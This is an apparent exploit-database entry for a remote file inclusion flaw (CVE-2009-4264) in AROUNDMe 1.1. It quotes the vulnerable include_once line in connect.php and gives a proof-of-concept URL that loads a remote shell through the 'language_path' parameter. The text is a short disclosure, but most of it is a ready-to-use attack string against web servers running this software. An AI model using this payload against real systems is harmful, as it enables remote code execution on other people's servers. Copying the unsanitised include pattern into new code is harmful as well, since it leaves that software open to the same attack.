AROUNDMe 1.1 - 'language_path' Remote File Inclusion



EKU-ID: 17902 CVE: OSVDB-60683;CVE-2009-4264 OSVDB-ID:
Author: cr4wl3r Published: 2009-12-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


   [ Discovered by cr4wl3r \ Indonesian Hacker ]

########################################################################
3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)

       <?php
           include_once($language_path . 'connect.lang.php');
       ?>
########################################################################

########################################################################
PoC  :   http://server/[path]/components/core/connect.php?language_path=[Shell]
########################################################################

########################################################################
#Contact Me : cr4wl3r[4t]linuxmail[dot]org
########################################################################


   [ Gorontalo / 2009 ]